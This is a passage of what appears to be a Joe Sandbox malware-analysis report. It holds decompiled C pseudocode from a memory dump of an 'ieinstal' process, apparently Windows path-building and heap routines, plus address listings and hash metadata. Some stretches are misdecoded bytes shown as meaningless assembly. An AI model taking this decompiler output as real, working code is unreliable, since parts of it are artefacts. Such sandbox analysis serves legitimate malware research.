				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t274 = 0x48;
				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t319 = 0;
				_v37 = _t307;
				if(_v48 <= 0) {
					L16:
					_t45 = _t274 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t327 = 0xc0000106;
						goto L32;
					} else {
						_t326 = L1ED24620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
						_v52 = _t326;
						__eflags = _t326;
						if(_t326 == 0) {
							_t327 = 0xc0000017;
							goto L32;
						} else {
							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
							_t50 = _t326 + 0x48; // 0x48
							_t321 = _t50;
							_t307 = _v32;
							 *(_t326 + 0x3c) = _t274;
							_t276 = 0;
							 *((short*)(_t326 + 0x30)) = _v48;
							__eflags = _t307;
							if(_t307 != 0) {
								 *(_t326 + 0x18) = _t321;
								__eflags = _t307 - 0x1edf8478;
								 *_t326 = ((0 | _t307 == 0x1edf8478) - 0x00000001 & 0xfffffffb) + 7;
								E1ED4F3E0(_t321,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
								_t307 = _v32;
								_t337 = _t337 + 0xc;
								_t276 = 1;
								__eflags = _a8;
								_t321 = _t321 + (( *_t307 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t268 = E1ED939F2(_t321);
									_t307 = _v32;
									_t321 = _t268;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t327 = _v68;
								__eflags = 0;
								 *((short*)(_t321 - 2)) = 0;
								goto L32;
							} else {
								_t274 = _t326 + _t276 * 4;
								_v56 = _t274;
								do {
									__eflags = _t307;
									if(_t307 != 0) {
										_t230 =  *(_v60 + _t291 * 4);
										__eflags = _t230;
										if(_t230 == 0) {
											goto L30;
										} else {
											__eflags = _t230 == 5;
											if(_t230 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t274 =  *(_v60 + _t291 * 4);
										 *(_t274 + 0x18) = _t321;
										_t234 =  *(_v60 + _t291 * 4);
										__eflags = _t234 - 8;
										if(_t234 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t234 * 4 +  &M1ED32959))) {
												case 0:
													__ax =  *0x1edf8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E1ED4F3E0(__edi,  *0x1edf848c, __ax & 0x0000ffff);
														__eax =  *0x1edf8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E1ED4F3E0(_t321, _v80, _v64);
													_t263 = _v64;
													goto L26;
												case 2:
													 *0x1edf8480 & 0x0000ffff = E1ED4F3E0(__edi,  *0x1edf8484,  *0x1edf8480 & 0x0000ffff);
													__eax =  *0x1edf8480 & 0x0000ffff;
													__eax = ( *0x1edf8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E1ED4F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E1ED4F3E0(_t321, _v76, _v36);
														_t263 = _v36;
													}
													L26:
													_t337 = _t337 + 0xc;
													_t321 = _t321 + (_t263 >> 1) * 2 + 2;
													__eflags = _t321;
													L27:
													_push(0x3b);
													_pop(_t265);
													 *((short*)(_t321 - 2)) = _t265;
													goto L28;
												case 6:
													__ebx =  *0x1edf575c;
													__eflags = __ebx - 0x1edf575c;
													if(__ebx != 0x1edf575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E1ED4F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x1edf575c;
														} while (__ebx != 0x1edf575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1edf8478 & 0x0000ffff = E1ED4F3E0(__edi,  *0x1edf847c,  *0x1edf8478 & 0x0000ffff);
													__eax =  *0x1edf8478 & 0x0000ffff;
													__eax = ( *0x1edf8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E1ED939F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1edf6e58 & 0x0000ffff = E1ED4F3E0(__edi,  *0x1edf6e5c,  *0x1edf6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1edf6e58 & 0x0000ffff;
													__eax = ( *0x1edf6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t307 = _v32;
													L29:
													_t274 = _t274 + 4;
													__eflags = _t274;
													_v56 = _t274;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t234 =  *(_v60 + _t319 * 4);
						if(_t234 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t234 * 4 +  &M1ED32935))) {
							case 0:
								__ax =  *0x1edf8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t307 =  &_v64;
								_v80 = E1ED32E3E(0,  &_v64);
								_t274 = _t274 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1edf8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1edf8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E1ED1EEF0(0x1edf79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E1ED1EB70(__ecx, 0x1edf79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t208 = _v72;
											__eflags = _t208;
											if(_t208 != 0) {
												L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t208);
											}
											_t209 = _v52;
											__eflags = _t209;
											if(_t209 != 0) {
												__eflags = _t327;
												if(_t327 < 0) {
													L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t209);
													_t209 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1edf7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L1ED24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E1ED1EB70(__ecx, 0x1edf79a0);
										__eax = _v52;
										L36:
										_pop(_t320);
										_pop(_t328);
										__eflags = _v8 ^ _t333;
										_pop(_t275);
										return E1ED4B640(_t209, _t275, _v8 ^ _t333, _t307, _t320, _t328);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t270 = _v56;
								if(_v56 != 0) {
									_t307 =  &_v36;
									_t272 = E1ED32E3E(_t270,  &_v36);
									_t287 = _v36;
									_v76 = _t272;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t274 = _t274 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x1edf5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1edf8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1edf8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1edf6e58 & 0x0000ffff;
								__eax = ( *0x1edf6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t319 = _t319 + 1;
								if(_t319 >= _v48) {
									goto L16;
								} else {
									_t307 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_push(0x25);
					asm("int 0x29");
					asm("out 0x28, al");
					asm("rcr dword [esi], cl");
					asm("o16 sub bl, dl");
					_push(ds);
					asm("loopne 0x29");
					asm("rcr dword [esi], cl");
					asm("rcr dword [es:esi], cl");
					_t279 = ds;
					asm("xlatb");
					_push(ds);
					_t339 = _t234 + 0x1f1ed326;
					_push(ds);
					_t237 = _t337 ^ 0x021ed75b;
					_push(ds);
					 *_t237 =  *_t237 - 0xd3;
					_push(ds);
					asm("rcr dword [esi], cl");
					_push(ds);
					_push(ds);
					_t330 = _t326 + 1 - 1;
					_t283 = _t279 - _t307 - _t307 - (_t237 *  *_t321 >> 0x20) - (_t237 *  *_t321 >> 0x20);
					_push(ds);
					asm("daa");
					asm("rcr dword [esi], cl");
					asm("fcomp dword [ebx-0x29]");
					_push(ds);
					asm("rcr dword [esi], cl");
					asm("xlatb");
					_push(ds);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x1eddff00);
					E1ED5D08C(_t283, _t321, _t330);
					_v44 =  *[fs:0x18];
					_t322 = 0;
					 *_a24 = 0;
					_t284 = _a12;
					__eflags = _t284;
					if(_t284 == 0) {
						_t243 = 0xc0000100;
					} else {
						_v8 = 0;
						_t331 = 0xc0000100;
						_v52 = 0xc0000100;
						_t245 = 4;
						while(1) {
							_v40 = _t245;
							__eflags = _t245;
							if(_t245 == 0) {
								break;
							}
							_t297 = _t245 * 0xc;
							_v48 = _t297;
							__eflags = _t284 -  *((intOrPtr*)(_t297 + 0x1ece1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t260 = E1ED4E5C0(_a8,  *((intOrPtr*)(_t297 + 0x1ece1668)), _t284);
									_t339 = _t339 + 0xc;
									__eflags = _t260;
									if(__eflags == 0) {
										_t331 = E1ED851BE(_t284,  *((intOrPtr*)(_v48 + 0x1ece166c)), _a16, _t322, _t331, __eflags, _a20, _a24);
										_v52 = _t331;
										break;
									} else {
										_t245 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t245 = _t245 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t331;
						__eflags = _t331;
						if(_t331 < 0) {
							__eflags = _t331 - 0xc0000100;
							if(_t331 == 0xc0000100) {
								_t293 = _a4;
								__eflags = _t293;
								if(_t293 != 0) {
									_v36 = _t293;
									__eflags =  *_t293 - _t322;
									if( *_t293 == _t322) {
										_t331 = 0xc0000100;
										goto L76;
									} else {
										_t310 =  *((intOrPtr*)(_v44 + 0x30));
										_t247 =  *((intOrPtr*)(_t310 + 0x10));
										__eflags =  *((intOrPtr*)(_t247 + 0x48)) - _t293;
										if( *((intOrPtr*)(_t247 + 0x48)) == _t293) {
											__eflags =  *(_t310 + 0x1c);
											if( *(_t310 + 0x1c) == 0) {
												L106:
												_t331 = E1ED32AE4( &_v36, _a8, _t284, _a16, _a20, _a24);
												_v32 = _t331;
												__eflags = _t331 - 0xc0000100;
												if(_t331 != 0xc0000100) {
													goto L69;
												} else {
													_t322 = 1;
													_t293 = _v36;
													goto L75;
												}
											} else {
												_t250 = E1ED16600( *(_t310 + 0x1c));
												__eflags = _t250;
												if(_t250 != 0) {
													goto L106;
												} else {
													_t293 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t331 = E1ED32C50(_t293, _a8, _t284, _a16, _a20, _a24, _t322);
											L76:
											_v32 = _t331;
											goto L69;
										}
									}
									goto L108;
								} else {
									E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t331 = _a24;
									_t257 = E1ED32AE4( &_v36, _a8, _t284, _a16, _a20, _t331);
									_v32 = _t257;
									__eflags = _t257 - 0xc0000100;
									if(_t257 == 0xc0000100) {
										_v32 = E1ED32C50(_v36, _a8, _t284, _a16, _a20, _t331, 1);
									}
									_v8 = _t322;
									E1ED32ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t243 = _t331;
					}
					L70:
					return E1ED5D0D1(_t243);
				}
				L108:
			}




















































                        0x1ed32584
                        0x1ed32586
                        0x1ed32590
                        0x1ed32596
                        0x1ed32597
                        0x1ed32598
                        0x1ed32599
                        0x1ed3259e
                        0x1ed325a4
                        0x1ed325a9
                        0x1ed325ac
                        0x1ed325ae
                        0x1ed325b1
                        0x1ed325b2
                        0x1ed325b5
                        0x1ed325b8
                        0x1ed325bb
                        0x1ed325bc
                        0x1ed325bf
                        0x1ed325c2
                        0x1ed325c5
                        0x1ed325c6
                        0x1ed325cb
                        0x1ed325ce
                        0x1ed325d8
                        0x1ed325dd
                        0x1ed325de
                        0x1ed325e1
                        0x1ed325e3
                        0x1ed325e9
                        0x1ed326da
                        0x1ed326da
                        0x1ed326dd
                        0x1ed326e2
                        0x1ed75b56
                        0x00000000
                        0x1ed326e8
                        0x1ed326f9
                        0x1ed326fb
                        0x1ed326fe
                        0x1ed32700
                        0x1ed75b60
                        0x00000000
                        0x1ed32706
                        0x1ed32706
                        0x1ed3270a
                        0x1ed3270a
                        0x1ed3270d
                        0x1ed32713
                        0x1ed32716
                        0x1ed32718
                        0x1ed3271c
                        0x1ed3271e
                        0x1ed75b6c
                        0x1ed75b6f
                        0x1ed75b7f
                        0x1ed75b89
                        0x1ed75b8e
                        0x1ed75b93
                        0x1ed75b96
                        0x1ed75b9c
                        0x1ed75ba0
                        0x1ed75ba3
                        0x1ed75bab
                        0x1ed75bb0
                        0x1ed75bb3
                        0x1ed75bb3
                        0x1ed75ba3
                        0x1ed32724
                        0x1ed32726
                        0x1ed32729
                        0x1ed3272c
                        0x1ed3279d
                        0x1ed3279d
                        0x1ed327a0
                        0x1ed327a2
                        0x00000000
                        0x1ed3272e
                        0x1ed3272e
                        0x1ed32731
                        0x1ed32734
                        0x1ed32734
                        0x1ed32736
                        0x1ed75bc1
                        0x1ed75bc1
                        0x1ed75bc4
                        0x00000000
                        0x1ed75bca
                        0x1ed75bca
                        0x1ed75bcd
                        0x00000000
                        0x1ed75bd3
                        0x00000000
                        0x1ed75bd3
                        0x1ed75bcd
                        0x1ed3273c
                        0x1ed3273c
                        0x1ed32742
                        0x1ed32747
                        0x1ed3274a
                        0x1ed3274d
                        0x1ed32750
                        0x00000000
                        0x1ed32756
                        0x1ed32756
                        0x00000000
                        0x1ed32902
                        0x1ed32908
                        0x1ed3290b
                        0x00000000
                        0x1ed32911
                        0x1ed3291c
                        0x1ed32921
                        0x00000000
                        0x1ed32921
                        0x00000000
                        0x00000000
                        0x1ed32880
                        0x1ed32887
                        0x1ed3288c
                        0x00000000
                        0x00000000
                        0x1ed32805
                        0x1ed3280a
                        0x1ed32814
                        0x1ed32816
                        0x00000000
                        0x00000000
                        0x1ed3281e
                        0x1ed32821
                        0x1ed32823
                        0x00000000
                        0x1ed32829
                        0x1ed32829
                        0x1ed32831
                        0x1ed3283c
                        0x1ed3283e
                        0x00000000
                        0x1ed3283e
                        0x00000000
                        0x00000000
                        0x1ed3284e
                        0x1ed32850
                        0x1ed32851
                        0x1ed32854
                        0x1ed32857
                        0x1ed3285a
                        0x1ed3285c
                        0x1ed3285d
                        0x00000000
                        0x00000000
                        0x1ed3275d
                        0x1ed32761
                        0x00000000
                        0x1ed32767
                        0x1ed3276e
                        0x1ed32773
                        0x1ed32773
                        0x1ed32776
                        0x1ed32778
                        0x1ed3277e
                        0x1ed3277e
                        0x1ed32781
                        0x1ed32781
                        0x1ed32783
                        0x1ed32784
                        0x00000000
                        0x00000000
                        0x1ed75bd8
                        0x1ed75bde
                        0x1ed75be4
                        0x1ed75be6
                        0x1ed75be8
                        0x1ed75be9
                        0x1ed75bee
                        0x1ed75bf8
                        0x1ed75bff
                        0x1ed75c01
                        0x1ed75c04
                        0x1ed75c07
                        0x1ed75c0b
                        0x1ed75c0d
                        0x1ed75c0d
                        0x1ed75c15
                        0x1ed75c18
                        0x1ed75c1b
                        0x1ed75c1b
                        0x1ed75c1e
                        0x00000000
                        0x00000000
                        0x1ed328c3
                        0x1ed328c8
                        0x1ed328d2
                        0x1ed328d4
                        0x1ed328d8
                        0x1ed328db
                        0x1ed75c26
                        0x1ed75c28
                        0x1ed75c2d
                        0x1ed75c2d
                        0x00000000
                        0x00000000
                        0x1ed75c34
                        0x1ed75c36
                        0x1ed75c49
                        0x1ed75c4e
                        0x1ed75c54
                        0x1ed75c5b
                        0x1ed75c5d
                        0x1ed75c60
                        0x1ed32788
                        0x1ed32788
                        0x1ed3278b
                        0x1ed3278e
                        0x1ed3278e
                        0x1ed3278e
                        0x1ed32791
                        0x00000000
                        0x00000000
                        0x1ed32756
                        0x1ed32750
                        0x00000000
                        0x1ed32794
                        0x1ed32794
                        0x1ed32795
                        0x1ed32798
                        0x1ed32798
                        0x00000000
                        0x1ed32734
                        0x1ed3272c
                        0x1ed32700
                        0x1ed325ef
                        0x1ed325ef
                        0x1ed325ef
                        0x1ed325f2
                        0x1ed325f8
                        0x00000000
                        0x00000000
                        0x1ed325fe
                        0x00000000
                        0x1ed328e6
                        0x1ed328ec
                        0x1ed328ef
                        0x1ed328f5
                        0x1ed328f8
                        0x1ed328f8
                        0x00000000
                        0x1ed328f8
                        0x00000000
                        0x00000000
                        0x1ed32866
                        0x1ed32866
                        0x1ed32876
                        0x1ed32879
                        0x00000000
                        0x00000000
                        0x1ed327e0
                        0x1ed327e7
                        0x1ed327e9
                        0x1ed327eb
                        0x1ed75afd
                        0x00000000
                        0x1ed75afd
                        0x00000000
                        0x00000000
                        0x1ed32633
                        0x1ed32638
                        0x1ed3263b
                        0x1ed3263c
                        0x1ed3263e
                        0x1ed32640
                        0x1ed32642
                        0x1ed32647
                        0x1ed32649
                        0x1ed3264e
                        0x1ed32650
                        0x1ed32653
                        0x1ed32659
                        0x1ed326a2
                        0x1ed326a7
                        0x1ed326ac
                        0x1ed326b2
                        0x1ed75b11
                        0x1ed75b15
                        0x1ed75b17
                        0x00000000
                        0x1ed326b8
                        0x1ed326b8
                        0x1ed326ba
                        0x1ed327a6
                        0x1ed327a6
                        0x1ed327a9
                        0x1ed327ab
                        0x1ed327b9
                        0x1ed327b9
                        0x1ed327be
                        0x1ed327c1
                        0x1ed327c3
                        0x1ed327c5
                        0x1ed327c7
                        0x1ed75c74
                        0x1ed75c79
                        0x1ed75c79
                        0x1ed327c7
                        0x00000000
                        0x1ed326c0
                        0x1ed326c0
                        0x1ed326c3
                        0x1ed326c6
                        0x1ed326c6
                        0x1ed326c9
                        0x1ed326c9
                        0x00000000
                        0x1ed326c9
                        0x1ed326ba
                        0x1ed3265b
                        0x1ed3265b
                        0x1ed3265e
                        0x1ed32667
                        0x1ed3266d
                        0x1ed32677
                        0x1ed3267c
                        0x1ed3267f
                        0x1ed32681
                        0x1ed75b49
                        0x1ed75b4e
                        0x1ed327cd
                        0x1ed327d0
                        0x1ed327d1
                        0x1ed327d2
                        0x1ed327d4
                        0x1ed327dd
                        0x1ed32687
                        0x1ed32687
                        0x1ed3268a
                        0x1ed3268b
                        0x1ed3268e
                        0x1ed3268f
                        0x1ed32691
                        0x1ed32696
                        0x1ed32698
                        0x1ed3269d
                        0x1ed3269f
                        0x00000000
                        0x1ed3269f
                        0x1ed32681
                        0x00000000
                        0x00000000
                        0x1ed32846
                        0x00000000
                        0x00000000
                        0x1ed32605
                        0x1ed3260a
                        0x1ed3260c
                        0x1ed32611
                        0x1ed32616
                        0x1ed32619
                        0x1ed32619
                        0x1ed3261e
                        0x00000000
                        0x1ed32624
                        0x1ed32627
                        0x1ed32627
                        0x00000000
                        0x00000000
                        0x1ed75b1f
                        0x00000000
                        0x00000000
                        0x1ed32894
                        0x1ed3289b
                        0x1ed3289d
                        0x1ed328a1
                        0x1ed75b2b
                        0x1ed75b2e
                        0x1ed75b2e
                        0x1ed328a7
                        0x1ed328a9
                        0x1ed75b04
                        0x1ed75b09
                        0x1ed75b09
                        0x1ed75b09
                        0x00000000
                        0x00000000
                        0x1ed75b35
                        0x1ed75b3c
                        0x1ed328fb
                        0x1ed328fb
                        0x1ed326cc
                        0x1ed326cc
                        0x1ed326d0
                        0x00000000
                        0x1ed326d2
                        0x1ed326d2
                        0x00000000
                        0x1ed326d2
                        0x00000000
                        0x00000000
                        0x1ed325fe
                        0x1ed3292d
                        0x1ed3292d
                        0x1ed32930
                        0x1ed32935
                        0x1ed32937
                        0x1ed32939
                        0x1ed3293c
                        0x1ed3293d
                        0x1ed3293f
                        0x1ed32941
                        0x1ed3294e
                        0x1ed3294f
                        0x1ed32950
                        0x1ed32951
                        0x1ed32954
                        0x1ed32955
                        0x1ed3295c
                        0x1ed3295d
                        0x1ed32960
                        0x1ed32963
                        0x1ed32965
                        0x1ed32968
                        0x1ed32969
                        0x1ed3296a
                        0x1ed3296c
                        0x1ed3296e
                        0x1ed3296f
                        0x1ed32971
                        0x1ed32974
                        0x1ed32977
                        0x1ed3297b
                        0x1ed3297c
                        0x1ed3297d
                        0x1ed3297e
                        0x1ed3297f
                        0x1ed32980
                        0x1ed32981
                        0x1ed32982
                        0x1ed32983
                        0x1ed32984
                        0x1ed32985
                        0x1ed32986
                        0x1ed32987
                        0x1ed32988
                        0x1ed32989
                        0x1ed3298a
                        0x1ed3298b
                        0x1ed3298c
                        0x1ed3298d
                        0x1ed3298e
                        0x1ed3298f
                        0x1ed32990
                        0x1ed32992
                        0x1ed32997
                        0x1ed329a3
                        0x1ed329a6
                        0x1ed329ab
                        0x1ed329ad
                        0x1ed329b0
                        0x1ed329b2
                        0x1ed75c80
                        0x1ed329b8
                        0x1ed329b8
                        0x1ed329bb
                        0x1ed329c0
                        0x1ed329c5
                        0x1ed329c6
                        0x1ed329c6
                        0x1ed329c9
                        0x1ed329cb
                        0x00000000
                        0x00000000
                        0x1ed329cd
                        0x1ed329d0
                        0x1ed329d9
                        0x1ed329db
                        0x1ed329dd
                        0x1ed32a7f
                        0x1ed32a84
                        0x1ed32a87
                        0x1ed32a89
                        0x1ed75ca1
                        0x1ed75ca3
                        0x00000000
                        0x1ed32a8f
                        0x1ed32a8f
                        0x00000000
                        0x1ed32a8f
                        0x00000000
                        0x1ed329e3
                        0x1ed329e3
                        0x1ed329e3
                        0x00000000
                        0x1ed329e3
                        0x1ed329dd
                        0x00000000
                        0x1ed329db
                        0x1ed329e6
                        0x1ed329e9
                        0x1ed329eb
                        0x1ed329ed
                        0x1ed329f3
                        0x1ed329f5
                        0x1ed329f8
                        0x1ed329fa
                        0x1ed32a97
                        0x1ed32a9a
                        0x1ed32a9d
                        0x1ed32add
                        0x00000000
                        0x1ed32a9f
                        0x1ed32aa2
                        0x1ed32aa5
                        0x1ed32aa8
                        0x1ed32aab
                        0x1ed75cab
                        0x1ed75caf
                        0x1ed75cc5
                        0x1ed75cda
                        0x1ed75cdc
                        0x1ed75cdf
                        0x1ed75ce5
                        0x00000000
                        0x1ed75ceb
                        0x1ed75ced
                        0x1ed75cee
                        0x00000000
                        0x1ed75cee
                        0x1ed75cb1
                        0x1ed75cb4
                        0x1ed75cb9
                        0x1ed75cbb
                        0x00000000
                        0x1ed75cbd
                        0x1ed75cbd
                        0x00000000
                        0x1ed75cbd
                        0x1ed75cbb
                        0x1ed32ab1
                        0x1ed32ab1
                        0x1ed32ac4
                        0x1ed32ac6
                        0x1ed32ac6
                        0x00000000
                        0x1ed32ac6
                        0x1ed32aab
                        0x00000000
                        0x1ed32a00
                        0x1ed32a09
                        0x1ed32a0e
                        0x1ed32a21
                        0x1ed32a24
                        0x1ed32a35
                        0x1ed32a3a
                        0x1ed32a3d
                        0x1ed32a42
                        0x1ed32a59
                        0x1ed32a59
                        0x1ed32a5c
                        0x1ed32a5f
                        0x1ed32a5f
                        0x1ed329fa
                        0x1ed329f3
                        0x1ed32a64
                        0x1ed32a64
                        0x1ed32a6b
                        0x1ed32a6b
                        0x1ed32a6d
                        0x1ed32a72
                        0x1ed32a72
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: PATH
                        • API String ID: 0-1036084923
                        • Opcode ID: d323745cbe40ff88f96882c185c16c2c4e9ae98893e3e621cea0e0f7feaec233
                        • Instruction ID: f29a48a5355a38c0fb5bcb3dd84ceb469e10d4562736071692bae06ed76a018b
                        • Opcode Fuzzy Hash: d323745cbe40ff88f96882c185c16c2c4e9ae98893e3e621cea0e0f7feaec233
                        • Instruction Fuzzy Hash: 95C1A0F5D00259DFCB14CF99C891BEDB7B2FF48B01F654629E841AB290D734A942CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                        Download Yara Rule
                        C-Code - Quality: 80%
                        			E1ED3FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E1ED1EEF0(0x1edf7b60);
					_t134 =  *0x1edf7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1edf7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1edf7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
